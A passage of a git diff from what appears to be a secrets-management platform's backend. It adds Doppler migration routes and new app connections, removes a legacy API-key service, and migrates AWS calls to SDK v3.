z.string(), vaultNamespace: z.string(), - vaultSecretPath: z.string() + vaultSecretPaths: z.array(z.string()).min(1) }), response: { 200: z.object({ - status: z.nativeEnum(VaultImportStatus) + status: z.nativeEnum(ExternalMigrationImportStatus) }) } }, @@ -639,4 +692,135 @@ export const registerExternalMigrationRouter = async (server: FastifyZodProvider return { roles }; } }); + + // ─── Doppler In-Platform Migration Routes ──────────────────────────────────── + + server.route({ + method: "GET", + url: "/doppler/projects", + config: { rateLimit: readLimit }, + schema: { + operationId: "getDopplerProjectsV3", + querystring: z.object({ configId: z.string().uuid() }), + response: { + 200: z.object({ + projects: z + .object({ + id: z.string(), + slug: z.string(), + name: z.string(), + description: z.string().nullish() + }) + .array() + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const projects = await server.services.migration.getDopplerProjects({ + configId: req.query.configId, + actor: req.permission + }); + return { projects }; + } + }); + + server.route({ + method: "GET", + url: "/doppler/environments", + config: { rateLimit: readLimit }, + schema: { + operationId: "getDopplerEnvironmentsV3", + querystring: z.object({ + configId: z.string().uuid(), + projectSlug: z.string().min(1) + }), + response: { + 200: z.object({ + environments: z + .object({ + id: z.string(), + slug: z.string(), + name: z.string(), + project: z.string(), + parentId: z.string().nullish() + }) + .array() + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const environments = await server.services.migration.getDopplerEnvironments({ + configId: req.query.configId, + projectSlug: req.query.projectSlug, + actor: req.permission + }); + return { environments }; + } + }); + + server.route({ + method: "GET", + url: "/doppler/doppler-configs", + config: { rateLimit: readLimit }, + schema: { + operationId: "getDopplerConfigsV3", + querystring: z.object({ + configId: z.string().uuid(), + projectSlug: z.string().min(1) + }), + response: { + 200: z.object({ + configs: z + .object({ + name: z.string(), + root: z.boolean(), + locked: z.boolean(), + environment: z.string(), + project: z.string() + }) + .array() + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const configs = await server.services.migration.getDopplerConfigs({ + configId: req.query.configId, + projectSlug: req.query.projectSlug, + actor: req.permission + }); + return { configs }; + } + }); + + server.route({ + method: "POST", + url: "/doppler/import-secrets", + config: { rateLimit: writeLimit }, + schema: { + operationId: "importDopplerSecretsV3", + body: z.object({ + configId: z.string().uuid(), + dopplerProject: z.string().min(1), + dopplerEnvironment: z.string().min(1), + targetProjectId: z.string().min(1), + targetEnvironment: z.string().min(1), + targetSecretPath: z.string().min(1).default("/") + }), + response: { + 200: z.object({ status: z.string(), imported: z.number() }) + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const result = await server.services.migration.importDopplerSecrets({ + ...req.body, + actor: req.permission, + auditLogInfo: req.auditLogInfo + }); + return result; + } + }); }; diff --git a/backend/src/server/routes/v3/index.ts b/backend/src/server/routes/v3/index.ts index c770d089010..6df801082cb 100644 --- a/backend/src/server/routes/v3/index.ts +++ b/backend/src/server/routes/v3/index.ts @@ -3,12 +3,10 @@ import { registerDeprecatedSecretRouter } from "./deprecated-secret-router"; import { registerExternalMigrationRouter } from "./external-migration-router"; import { registerLoginRouter } from "./login-router"; import { registerSignupRouter } from "./signup-router"; -import { registerUserRouter } from "./user-router"; export const registerV3Routes = async (server: FastifyZodProvider) => { await server.register(registerSignupRouter, { prefix: "/signup" }); await server.register(registerLoginRouter, { prefix: "/auth" }); - await server.register(registerUserRouter, { prefix: "/users" }); await server.register(registerDeprecatedSecretRouter, { prefix: "/secrets" }); await server.register(registerExternalMigrationRouter, { prefix: "/external-migration" }); await server.register(registerCertificatesRouter, { prefix: "/pki/certificates" }); diff --git a/backend/src/server/routes/v3/login-router.ts b/backend/src/server/routes/v3/login-router.ts index a13a814ec62..eed36d57bdd 100644 --- a/backend/src/server/routes/v3/login-router.ts +++ b/backend/src/server/routes/v3/login-router.ts @@ -5,8 +5,10 @@ import { getConfig } from "@app/lib/config/env"; import { UnauthorizedError } from "@app/lib/errors"; import { authRateLimit } from "@app/server/config/rateLimiter"; import { addAuthOriginDomainCookie } from "@app/server/lib/cookie"; +import { getUserAgentType } from "@app/server/plugins/audit-log"; import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; import { AuthMode } from "@app/services/auth/auth-type"; +import { PostHogEventTypes } from "@app/services/telemetry/telemetry-types"; export const registerLoginRouter = async (server: FastifyZodProvider) => { server.route({ @@ -176,6 +178,15 @@ export const registerLoginRouter = async (server: FastifyZodProvider) => { }, { skipDedup: true } ); + + void server.services.telemetry.sendPostHogEvents({ + event: PostHogEventTypes.UserLoginV2, + distinctId: loginDistinctId, + properties: { + email: req.body.email, + channel: getUserAgentType(userAgent) + } + }); } void res.setCookie("jid", tokens.refreshToken, { diff --git a/backend/src/server/routes/v3/signup-router.ts b/backend/src/server/routes/v3/signup-router.ts index c6b079746da..033dae9d54a 100644 --- a/backend/src/server/routes/v3/signup-router.ts +++ b/backend/src/server/routes/v3/signup-router.ts @@ -106,11 +106,13 @@ export const registerSignupRouter = async (server: FastifyZodProvider) => { lastName: z.string().trim().optional(), attributionSource: z.string().trim().optional(), password: z.string(), - organizationName: GenericResourceNameSchema.optional() + organizationName: GenericResourceNameSchema.optional(), + hubspotUtk: z.string().trim().max(512).optional() }), z.object({ type: z.literal(CompleteAccountType.Alias), - code: z.string().trim() + code: z.string().trim(), + hubspotUtk: z.string().trim().max(512).optional() }) ]), response: { @@ -126,7 +128,7 @@ export const registerSignupRouter = async (server: FastifyZodProvider) => { if (!userAgent) throw new Error("user agent header is required"); const appCfg = getConfig(); - const { user, accessToken, refreshToken, authMethod, organizationId } = + const { user, accessToken, refreshToken, authMethod, organizationId, isInvitedUser } = await server.services.signup.completeAccount({ ...req.body, ip: req.realIp, @@ -138,12 +140,14 @@ export const registerSignupRouter = async (server: FastifyZodProvider) => { void server.services.telemetry.sendLoopsEvent(user.email, user.firstName || "", user.lastName || ""); void server.services.telemetry.sendHubSpotSignupEvent( user.email, - authMethod, + isInvitedUser ? "invite" : authMethod, user.firstName || "", - user.lastName || "" + user.lastName || "", + req.body.hubspotUtk ); } + const bodyAttributionSource = "attributionSource" in req.body ? req.body.attributionSource : undefined; void server.services.telemetry.sendPostHogEvents({ event: PostHogEventTypes.UserSignedUp, distinctId: user.username ?? "", @@ -151,7 +155,7 @@ export const registerSignupRouter = async (server: FastifyZodProvider) => { properties: { username: user.username, email: user.email ?? "", - attributionSource: "attributionSource" in req.body ? req.body.attributionSource : undefined + attributionSource: isInvitedUser ? "Team Invite" : bodyAttributionSource } }); diff --git a/backend/src/server/routes/v3/user-router.ts b/backend/src/server/routes/v3/user-router.ts deleted file mode 100644 index 41d7dce0868..00000000000 --- a/backend/src/server/routes/v3/user-router.ts +++ /dev/null @@ -1,29 +0,0 @@ -import { z } from "zod"; - -import { ApiKeysSchema } from "@app/db/schemas/api-keys"; -import { readLimit } from "@app/server/config/rateLimiter"; -import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; -import { AuthMode } from "@app/services/auth/auth-type"; - -export const registerUserRouter = async (server: FastifyZodProvider) => { - server.route({ - method: "GET", - url: "/me/api-keys", - config: { - rateLimit: readLimit - }, - schema: { - operationId: "getMyApiKeysV3", - response: { - 200: z.object({ - apiKeyData: ApiKeysSchema.omit({ secretHash: true }).array() - }) - } - }, - onRequest: verifyAuth([AuthMode.JWT]), - handler: async (req) => { - const apiKeyData = await server.services.apiKey.getMyApiKeys(req.permission.id); - return { apiKeyData }; - } - }); -}; diff --git a/backend/src/services/account-recovery/account-recovery-service.ts b/backend/src/services/account-recovery/account-recovery-service.ts index b37247e654c..c773f888a8f 100644 --- a/backend/src/services/account-recovery/account-recovery-service.ts +++ b/backend/src/services/account-recovery/account-recovery-service.ts @@ -112,7 +112,7 @@ export const accountRecoveryServiceFactory = ({ const token = crypto.jwt().sign( { - authTokenType: AuthTokenType.SIGNUP_TOKEN, + authTokenType: AuthTokenType.ACCOUNT_RECOVERY_TOKEN, userId: user.id }, cfg.AUTH_SECRET, diff --git a/backend/src/services/additional-privilege/project/project-additional-privilege-factory.ts b/backend/src/services/additional-privilege/project/project-additional-privilege-factory.ts index 9fbc7f665fc..6dedc7fdddc 100644 --- a/backend/src/services/additional-privilege/project/project-additional-privilege-factory.ts +++ b/backend/src/services/additional-privilege/project/project-additional-privilege-factory.ts @@ -13,6 +13,8 @@ import { ProjectPermissionSub } from "@app/ee/services/permission/project-permission"; import { BadRequestError, NotFoundError, PermissionBoundaryError } from "@app/lib/errors"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { OrgServiceActor } from "@app/lib/types"; import { unpackPermissions } from "@app/server/routes/sanitizedSchema/permission"; import { ActorType } from "@app/services/auth/auth-type"; @@ -413,7 +415,10 @@ export const newProjectAdditionalPrivilegesFactory = ({ : ([ProjectPermissionIdentityActions.Edit, ProjectPermissionSub.Identity] as const); ForbiddenError.from(permission).throwUnlessCan(...permissionSet); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(dto.permission.orgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(dto.permission.orgId), + () => orgDAL.findById(dto.permission.orgId) + ); const { permission: targetUserPermission, memberships } = await $getPermission( { ...dto.permission, type: actorType, id: actorId }, scope.value @@ -454,7 +459,10 @@ export const newProjectAdditionalPrivilegesFactory = ({ : ([ProjectPermissionIdentityActions.Edit, ProjectPermissionSub.Identity] as const); ForbiddenError.from(permission).throwUnlessCan(...permissionSet); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(dto.permission.orgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(dto.permission.orgId), + () => orgDAL.findById(dto.permission.orgId) + ); const { permission: targetUserPermission, memberships } = await $getPermission( { ...dto.permission, type: actorType, id: actorId }, scope.value diff --git a/backend/src/services/api-key/api-key-dal.ts b/backend/src/services/api-key/api-key-dal.ts deleted file mode 100644 index 128adc7013f..00000000000 --- a/backend/src/services/api-key/api-key-dal.ts +++ /dev/null @@ -1,7 +0,0 @@ -import { TDbClient } from "@app/db"; -import { TableName } from "@app/db/schemas"; -import { ormify } from "@app/lib/knex"; - -export type TApiKeyDALFactory = ReturnType; - -export const apiKeyDALFactory = (db: TDbClient) => ormify(db, TableName.ApiKey); diff --git a/backend/src/services/api-key/api-key-service.ts b/backend/src/services/api-key/api-key-service.ts deleted file mode 100644 index b928bbd6de6..00000000000 --- a/backend/src/services/api-key/api-key-service.ts +++ /dev/null @@ -1,72 +0,0 @@ -import { TApiKeys } from "@app/db/schemas/api-keys"; -import { getConfig } from "@app/lib/config/env"; -import { crypto } from "@app/lib/crypto/cryptography"; -import { NotFoundError, UnauthorizedError } from "@app/lib/errors"; - -import { TUserDALFactory } from "../user/user-dal"; -import { TApiKeyDALFactory } from "./api-key-dal"; - -type TApiKeyServiceFactoryDep = { - apiKeyDAL: TApiKeyDALFactory; - userDAL: Pick; -}; - -export type TApiKeyServiceFactory = ReturnType; - -const formatApiKey = ({ secretHash, ...data }: TApiKeys) => data; - -export const apiKeyServiceFactory = ({ apiKeyDAL, userDAL }: TApiKeyServiceFactoryDep) => { - const getMyApiKeys = async (userId: string) => { - const apiKeys = await apiKeyDAL.find({ userId }); - return apiKeys.map((key) => formatApiKey(key)); - }; - - const createApiKey = async (userId: string, name: string, expiresIn: number) => { - const appCfg = getConfig(); - const secret = crypto.randomBytes(16).toString("hex"); - const secretHash = await crypto.hashing().createHash(secret, appCfg.SALT_ROUNDS); - const expiresAt = new Date(); - expiresAt.setSeconds(expiresAt.getSeconds() + expiresIn); - - const apiKeyData = await apiKeyDAL.create({ - userId, - name, - expiresAt, - secretHash, - lastUsed: new Date() - }); - const apiKey = `ak.${apiKeyData.id}.${secret}`; - - return { apiKey, apiKeyData: formatApiKey(apiKeyData) }; - }; - - const deleteApiKey = async (userId: string, apiKeyId: string) => { - const [apiKeyData] = await apiKeyDAL.delete({ id: apiKeyId, userId }); - if (!apiKeyData) throw new NotFoundError({ message: `API key with ID '${apiKeyId}' not found` }); - return formatApiKey(apiKeyData); - }; - - const fnValidateApiKey = async (token: string) => { - const [, TOKEN_IDENTIFIER, TOKEN_SECRET] = <[string, string, string]>token.split(".", 3); - const apiKey = await apiKeyDAL.findById(TOKEN_IDENTIFIER); - if (!apiKey) throw new UnauthorizedError(); - - if (apiKey.expiresAt && new Date(apiKey.expiresAt) < new Date()) { - await apiKeyDAL.deleteById(apiKey.id); - throw new UnauthorizedError(); - } - - const isMatch = await crypto.hashing().compareHash(TOKEN_SECRET, apiKey.secretHash); - if (!isMatch) throw new UnauthorizedError(); - await apiKeyDAL.updateById(apiKey.id, { lastUsed: new Date() }); - const user = await userDAL.findById(apiKey.userId); - return user; - }; - - return { - getMyApiKeys, - createApiKey, - deleteApiKey, - fnValidateApiKey - }; -}; diff --git a/backend/src/services/api-key/api-key-types.ts b/backend/src/services/api-key/api-key-types.ts deleted file mode 100644 index e69de29bb2d..00000000000 diff --git a/backend/src/services/app-connection/app-connection-enums.ts b/backend/src/services/app-connection/app-connection-enums.ts index fe4dcf4d06c..9699f93854e 100644 --- a/backend/src/services/app-connection/app-connection-enums.ts +++ b/backend/src/services/app-connection/app-connection-enums.ts @@ -52,9 +52,14 @@ export enum AppConnection { CircleCI = "circleci", AzureEntraId = "azure-entra-id", Venafi = "venafi", + VenafiTpp = "venafi-tpp", ExternalInfisical = "external-infisical", + Doppler = "doppler", NetScaler = "netscaler", - Anthropic = "anthropic" + Anthropic = "anthropic", + Ona = "ona", + DigiCert = "digicert", + TravisCI = "travis-ci" } export enum AWSRegion { diff --git a/backend/src/services/app-connection/app-connection-fns.ts b/backend/src/services/app-connection/app-connection-fns.ts index 5295ee62c45..359f8d4608a 100644 --- a/backend/src/services/app-connection/app-connection-fns.ts +++ b/backend/src/services/app-connection/app-connection-fns.ts @@ -108,6 +108,11 @@ import { validateDatabricksConnectionCredentials } from "./databricks/databricks-connection-fns"; import { DbtConnectionMethod, getDbtConnectionListItem, validateDbtConnectionCredentials } from "./dbt"; +import { + DigiCertConnectionMethod, + getDigiCertConnectionListItem, + validateDigiCertConnectionCredentials +} from "./digicert"; import { DigitalOceanConnectionMethod, getDigitalOceanConnectionListItem, @@ -118,6 +123,7 @@ import { getDNSMadeEasyConnectionListItem, validateDNSMadeEasyConnectionCredentials } from "./dns-made-easy/dns-made-easy-connection-fns"; +import { DopplerConnectionMethod, getDopplerConnectionListItem, validateDopplerConnectionCredentials } from "./doppler"; import { ExternalInfisicalConnectionMethod, getExternalInfisicalConnectionListItem, @@ -173,6 +179,7 @@ import { validateOctopusDeployConnectionCredentials } from "./octopus-deploy"; import { getOktaConnectionListItem, OktaConnectionMethod, validateOktaConnectionCredentials } from "./okta"; +import { getOnaConnectionListItem, OnaConnectionMethod, validateOnaConnectionCredentials } from "./ona"; import { getOpenRouterConnectionListItem, OpenRouterConnectionMethod, @@ -200,7 +207,18 @@ import { TerraformCloudConnectionMethod, validateTerraformCloudConnectionCredentials } from "./terraform-cloud"; +import { + getTravisCIConnectionListItem, + TravisCIConnectionMethod, + validateTravisCIConnectionCredentials +} from "./travis-ci"; import { getVenafiConnectionListItem, validateVenafiConnectionCredentials, VenafiConnectionMethod } from "./venafi"; +import { + getVenafiTppConnectionListItem, + validateVenafiTppConnectionCredentials, + VenafiTppConnectionMethod +} from "./venafi-tpp"; +import { TVenafiTppConnectionConfig } from "./venafi-tpp/venafi-tpp-connection-types"; import { VercelConnectionMethod } from "./vercel"; import { getVercelConnectionListItem, validateVercelConnectionCredentials } from "./vercel/vercel-connection-fns"; import { @@ -232,7 +250,9 @@ const PKI_APP_CONNECTIONS = [ AppConnection.DNSMadeEasy, AppConnection.AzureDNS, AppConnection.Venafi, - AppConnection.NetScaler + AppConnection.VenafiTpp, + AppConnection.NetScaler, + AppConnection.DigiCert ]; export const listAppConnectionOptions = (projectType?: ProjectType) => { @@ -291,8 +311,13 @@ export const listAppConnectionOptions = (projectType?: ProjectType) => { getCircleCIConnectionListItem(), getAzureEntraIdConnectionListItem(), getVenafiConnectionListItem(), + getVenafiTppConnectionListItem(), getExternalInfisicalConnectionListItem(), - getNetScalerConnectionListItem() + getDopplerConnectionListItem(), + getNetScalerConnectionListItem(), + getOnaConnectionListItem(), + getDigiCertConnectionListItem(), + getTravisCIConnectionListItem() ] .filter((option) => { switch (projectType) { @@ -438,12 +463,21 @@ export const validateAppConnectionCredentials = async ( [AppConnection.CircleCI]: validateCircleCIConnectionCredentials as TAppConnectionCredentialsValidator, [AppConnection.AzureEntraId]: validateAzureEntraIdConnectionCredentials as TAppConnectionCredentialsValidator, [AppConnection.Venafi]: validateVenafiConnectionCredentials as TAppConnectionCredentialsValidator, + [AppConnection.VenafiTpp]: ((config: TAppConnectionConfig) => + validateVenafiTppConnectionCredentials( + config as TVenafiTppConnectionConfig, + gatewayV2Service + )) as TAppConnectionCredentialsValidator, [AppConnection.NetScaler]: validateNetScalerConnectionCredentials as TAppConnectionCredentialsValidator, + [AppConnection.Ona]: validateOnaConnectionCredentials as TAppConnectionCredentialsValidator, + [AppConnection.TravisCI]: validateTravisCIConnectionCredentials as TAppConnectionCredentialsValidator, [AppConnection.ExternalInfisical]: ((config: TAppConnectionConfig) => validateExternalInfisicalConnectionCredentials( config as TExternalInfisicalConnectionConfig, deps.identityUaDAL - )) as TAppConnectionCredentialsValidator + )) as TAppConnectionCredentialsValidator, + [AppConnection.Doppler]: validateDopplerConnectionCredentials as TAppConnectionCredentialsValidator, + [AppConnection.DigiCert]: validateDigiCertConnectionCredentials as TAppConnectionCredentialsValidator }; return VALIDATE_APP_CONNECTION_CREDENTIALS_MAP[appConnection.app](appConnection, gatewayService, gatewayV2Service); @@ -455,6 +489,7 @@ export const getAppConnectionMethodName = (method: TAppConnection["method"]) => case GitHubRadarConnectionMethod.App: return "GitHub App"; case GitHubConnectionMethod.Pat: + case OnaConnectionMethod.PersonalAccessToken: return "Personal Access Token"; case AzureKeyVaultConnectionMethod.OAuth: case AzureAppConfigurationConnectionMethod.OAuth: @@ -463,6 +498,7 @@ export const getAppConnectionMethodName = (method: TAppConnection["method"]) => case AzureDevOpsConnectionMethod.OAuth: case HerokuConnectionMethod.OAuth: case GitLabConnectionMethod.OAuth: + case VenafiTppConnectionMethod.OAuth: return "OAuth"; case HerokuConnectionMethod.AuthToken: return "Auth Token"; @@ -490,6 +526,7 @@ export const getAppConnectionMethodName = (method: TAppConnection["method"]) => case LaravelForgeConnectionMethod.ApiToken: case DbtConnectionMethod.ApiToken: case CircleCIConnectionMethod.ApiToken: + case TravisCIConnectionMethod.ApiToken: return "API Token"; case DNSMadeEasyConnectionMethod.APIKeySecret: return "API Key & Secret"; @@ -523,12 +560,12 @@ export const getAppConnectionMethodName = (method: TAppConnection["method"]) => case SmbConnectionMethod.Credentials: return "Credentials"; case VenafiConnectionMethod.ApiKey: - return "API Key"; case RenderConnectionMethod.ApiKey: case ChecklyConnectionMethod.ApiKey: case OctopusDeployConnectionMethod.ApiKey: case OpenRouterConnectionMethod.ApiKey: case AnthropicConnectionMethod.ApiKey: + case DigiCertConnectionMethod.ApiKey: return "API Key"; case ChefConnectionMethod.UserKey: return "User Key"; @@ -538,6 +575,8 @@ export const getAppConnectionMethodName = (method: TAppConnection["method"]) => return "Basic Auth"; case ExternalInfisicalConnectionMethod.MachineIdentityUniversalAuth: return "Machine Identity - Universal Auth"; + case DopplerConnectionMethod.ApiToken: + return "API Token"; default: // eslint-disable-next-line @typescript-eslint/restrict-template-expressions throw new Error(`Unhandled App Connection Method: ${method}`); @@ -646,8 +685,13 @@ export const TRANSITION_CONNECTION_CREDENTIALS_TO_PLATFORM: Record< [AppConnection.CircleCI]: platformManagedCredentialsNotSupported, [AppConnection.AzureEntraId]: platformManagedCredentialsNotSupported, [AppConnection.Venafi]: platformManagedCredentialsNotSupported, + [AppConnection.VenafiTpp]: platformManagedCredentialsNotSupported, [AppConnection.ExternalInfisical]: platformManagedCredentialsNotSupported, - [AppConnection.NetScaler]: platformManagedCredentialsNotSupported + [AppConnection.NetScaler]: platformManagedCredentialsNotSupported, + [AppConnection.Doppler]: platformManagedCredentialsNotSupported, + [AppConnection.Ona]: platformManagedCredentialsNotSupported, + [AppConnection.DigiCert]: platformManagedCredentialsNotSupported, + [AppConnection.TravisCI]: platformManagedCredentialsNotSupported }; export const enterpriseAppCheck = async ( diff --git a/backend/src/services/app-connection/app-connection-maps.ts b/backend/src/services/app-connection/app-connection-maps.ts index b3de1153d2b..645ad41cb1e 100644 --- a/backend/src/services/app-connection/app-connection-maps.ts +++ b/backend/src/services/app-connection/app-connection-maps.ts @@ -54,9 +54,14 @@ export const APP_CONNECTION_NAME_MAP: Record = { [AppConnection.CircleCI]: "CircleCI", [AppConnection.AzureEntraId]: "Azure Entra ID", [AppConnection.Venafi]: "Venafi TLS Protect Cloud", + [AppConnection.VenafiTpp]: "Venafi TPP", [AppConnection.ExternalInfisical]: "Infisical", + [AppConnection.Doppler]: "Doppler", [AppConnection.NetScaler]: "NetScaler", - [AppConnection.Anthropic]: "Anthropic" + [AppConnection.Anthropic]: "Anthropic", + [AppConnection.Ona]: "Ona", + [AppConnection.DigiCert]: "DigiCert", + [AppConnection.TravisCI]: "Travis CI" }; export const APP_CONNECTION_PLAN_MAP: Record = { @@ -113,7 +118,12 @@ export const APP_CONNECTION_PLAN_MAP: Record>>; @@ -451,9 +486,14 @@ export type TAppConnectionInput = { id: string } & ( | TCircleCIConnectionInput | TAzureEntraIdConnectionInput | TVenafiConnectionInput + | TVenafiTppConnectionInput | TExternalInfisicalConnectionInput + | TDopplerConnectionInput | TNetScalerConnectionInput | TAnthropicConnectionInput + | TOnaConnectionInput + | TDigiCertConnectionInput + | TTravisCIConnectionInput ); export type TSqlConnectionInput = @@ -547,9 +587,14 @@ export type TAppConnectionConfig = | TCircleCIConnectionConfig | TAzureEntraIdConnectionConfig | TVenafiConnectionConfig + | TVenafiTppConnectionConfig | TExternalInfisicalConnectionConfig + | TDopplerConnectionConfig | TNetScalerConnectionConfig - | TAnthropicConnectionConfig; + | TAnthropicConnectionConfig + | TOnaConnectionConfig + | TDigiCertConnectionConfig + | TTravisCIConnectionConfig; export type TValidateAppConnectionCredentialsSchema = | TValidateAwsConnectionCredentialsSchema @@ -605,9 +650,14 @@ export type TValidateAppConnectionCredentialsSchema = | TValidateCircleCIConnectionCredentialsSchema | TValidateAzureEntraIdConnectionCredentialsSchema | TValidateVenafiConnectionCredentialsSchema + | TValidateVenafiTppConnectionCredentialsSchema | TValidateExternalInfisicalConnectionCredentialsSchema + | TValidateDopplerConnectionCredentialsSchema | TValidateNetScalerConnectionCredentialsSchema - | TValidateAnthropicConnectionCredentialsSchema; + | TValidateAnthropicConnectionCredentialsSchema + | TValidateOnaConnectionCredentialsSchema + | TValidateDigiCertConnectionCredentialsSchema + | TValidateTravisCIConnectionCredentialsSchema; export type TListAwsConnectionKmsKeys = { connectionId: string; diff --git a/backend/src/services/app-connection/aws/aws-connection-fns.ts b/backend/src/services/app-connection/aws/aws-connection-fns.ts index bc22b60a702..50654bc78ae 100644 --- a/backend/src/services/app-connection/aws/aws-connection-fns.ts +++ b/backend/src/services/app-connection/aws/aws-connection-fns.ts @@ -1,6 +1,4 @@ -import { AssumeRoleCommand, STSClient } from "@aws-sdk/client-sts"; -import type { AWSError, Response } from "aws-sdk"; -import STS from "aws-sdk/clients/sts.js"; +import { AssumeRoleCommand, GetCallerIdentityCommand, STSClient, STSServiceException } from "@aws-sdk/client-sts"; import { AxiosError } from "axios"; import { CustomAWSHasher } from "@app/lib/aws/hashing"; @@ -87,18 +85,28 @@ export const getAwsConnectionConfig = async (appConnection: TAwsConnectionConfig }; export const validateAwsConnectionCredentials = async (appConnection: TAwsConnectionConfig) => { - let resp: STS.GetCallerIdentityResponse & { - $response: Response; - }; - try { const awsConfig = await getAwsConnectionConfig(appConnection); - const sts = new STS(awsConfig); + const sts = new STSClient({ + region: awsConfig.region, + credentials: awsConfig.credentials + }); - resp = await sts.getCallerIdentity().promise(); + await sts.send(new GetCallerIdentityCommand({})); } catch (error: unknown) { logger.error(error, "Error validating AWS connection credentials"); + // v3 SDK throws on non-2xx responses (v2 resolved and required manual status check). + // Preserve the original InternalServerError for AWS-level failures. + if (error instanceof STSServiceException) { + throw new InternalServerError({ + message: `Unable to validate credentials: ${ + error.message ?? + `AWS responded with a status code of ${error.$metadata.httpStatusCode}. Verify credentials and try again.` + }` + }); + } + let message: string; if (error instanceof AxiosError) { @@ -113,13 +121,5 @@ export const validateAwsConnectionCredentials = async (appConnection: TAwsConnec }); } - if (resp?.$response.httpResponse.statusCode !== 200) - throw new InternalServerError({ - message: `Unable to validate credentials: ${ - resp.$response.error?.message ?? - `AWS responded with a status code of ${resp.$response.httpResponse.statusCode}. Verify credentials and try again.` - }` - }); - return appConnection.credentials; }; diff --git a/backend/src/services/app-connection/aws/aws-connection-service.ts b/backend/src/services/app-connection/aws/aws-connection-service.ts index 0046b18c7eb..4d4ef10ff51 100644 --- a/backend/src/services/app-connection/aws/aws-connection-service.ts +++ b/backend/src/services/app-connection/aws/aws-connection-service.ts @@ -1,6 +1,16 @@ -import ELBv2 from "aws-sdk/clients/elbv2.js"; -import IAM from "aws-sdk/clients/iam.js"; -import KMS from "aws-sdk/clients/kms.js"; +import { + DescribeListenersCommand, + DescribeLoadBalancersCommand, + ElasticLoadBalancingV2Client +} from "@aws-sdk/client-elastic-load-balancing-v2"; +import { IAMClient, ListUsersCommand, type User } from "@aws-sdk/client-iam"; +import { + type AliasListEntry, + DescribeKeyCommand, + type KeyMetadata, + KMSClient, + ListAliasesCommand +} from "@aws-sdk/client-kms"; import { OrgServiceActor } from "@app/lib/types"; import { AppConnection, AWSRegion } from "@app/services/app-connection/app-connection-enums"; @@ -27,24 +37,24 @@ const listAwsKmsKeys = async ( ) => { const { credentials } = await getAwsConnectionConfig(appConnection, region); - const awsKms = new KMS({ + const awsKms = new KMSClient({ credentials, region }); - const aliasEntries: KMS.AliasList = []; + const aliasEntries: AliasListEntry[] = []; let aliasMarker: string | undefined; do { // eslint-disable-next-line no-await-in-loop - const response = await awsKms.listAliases({ Limit: 100, Marker: aliasMarker }).promise(); + const response = await awsKms.send(new ListAliasesCommand({ Limit: 100, Marker: aliasMarker })); aliasEntries.push(...(response.Aliases || [])); aliasMarker = response.NextMarker; } while (aliasMarker); - const keyMetadataRecord: Record = {}; + const keyMetadataRecord: Record = {}; for await (const aliasEntry of aliasEntries) { if (aliasEntry.TargetKeyId) { - const keyDescription = await awsKms.describeKey({ KeyId: aliasEntry.TargetKeyId }).promise(); + const keyDescription = await awsKms.send(new DescribeKeyCommand({ KeyId: aliasEntry.TargetKeyId })); keyMetadataRecord[aliasEntry.TargetKeyId] = keyDescription.KeyMetadata; } @@ -79,15 +89,15 @@ const listAwsKmsKeys = async ( }; const listAwsIamUsers = async (appConnection: TAwsConnection) => { - const { credentials } = await getAwsConnectionConfig(appConnection); + const { region, credentials } = await getAwsConnectionConfig(appConnection); - const iam = new IAM({ credentials }); + const iam = new IAMClient({ credentials, region }); - const userEntries: IAM.User[] = []; + const userEntries: User[] = []; let userMarker: string | undefined; do { // eslint-disable-next-line no-await-in-loop - const response = await iam.listUsers({ MaxItems: 100, Marker: userMarker }).promise(); + const response = await iam.send(new ListUsersCommand({ MaxItems: 100, Marker: userMarker })); userEntries.push(...(response.Users || [])); userMarker = response.Marker; } while (userMarker); @@ -123,7 +133,7 @@ const listAwsLoadBalancers = async ( ): Promise => { const { credentials } = await getAwsConnectionConfig(appConnection, region); - const elbClient = new ELBv2({ + const elbClient = new ElasticLoadBalancingV2Client({ credentials, region }); @@ -133,11 +143,11 @@ const listAwsLoadBalancers = async ( do { // eslint-disable-next-line no-await-in-loop - const response = await elbClient - .describeLoadBalancers({ + const response = await elbClient.send( + new DescribeLoadBalancersCommand({ Marker: marker }) - .promise(); + ); if (response.LoadBalancers) { for (const lb of response.LoadBalancers) { @@ -169,7 +179,7 @@ const listAwsListeners = async ( ): Promise => { const { credentials } = await getAwsConnectionConfig(appConnection, region); - const elbClient = new ELBv2({ + const elbClient = new ElasticLoadBalancingV2Client({ credentials, region }); @@ -179,12 +189,12 @@ const listAwsListeners = async ( do { // eslint-disable-next-line no-await-in-loop - const response = await elbClient - .describeListeners({ + const response = await elbClient.send( + new DescribeListenersCommand({ LoadBalancerArn: loadBalancerArn, Marker: marker }) - .promise(); + ); if (response.Listeners) { for (const listener of response.Listeners) { diff --git a/backend/src/services/app-connection/bitbucket/bitbucket-connection-fns.ts b/backend/src/services/app-connection/bitbucket/bitbucket-connection-fns.ts index 646dc595a87..a3169a0b3f0 100644 --- a/backend/src/services/app-connection/bitbucket/bitbucket-connection-fns.ts +++ b/backend/src/services/app-connection/bitbucket/bitbucket-connection-fns.ts @@ -53,8 +53,12 @@ export const validateBitbucketConnectionCredentials = async (config: TBitbucketC return config.credentials; }; +interface BitbucketWorkspaceMembership { + workspace: { slug: string }; +} + interface BitbucketWorkspacesResponse { - values: TBitbucketWorkspace[]; + values: BitbucketWorkspaceMembership[]; next?: string; } @@ -67,7 +71,7 @@ export const listBitbucketWorkspaces = async (appConnection: TBitbucketConnectio }; let allWorkspaces: TBitbucketWorkspace[] = []; - let nextUrl: string | undefined = `${IntegrationUrls.BITBUCKET_API_URL}/2.0/workspaces?pagelen=100`; + let nextUrl: string | undefined = `${IntegrationUrls.BITBUCKET_API_URL}/2.0/user/workspaces?pagelen=100`; let iterationCount = 0; // Limit to 10 iterations, fetching at most 10 * 100 = 1000 workspaces @@ -77,7 +81,7 @@ export const listBitbucketWorkspaces = async (appConnection: 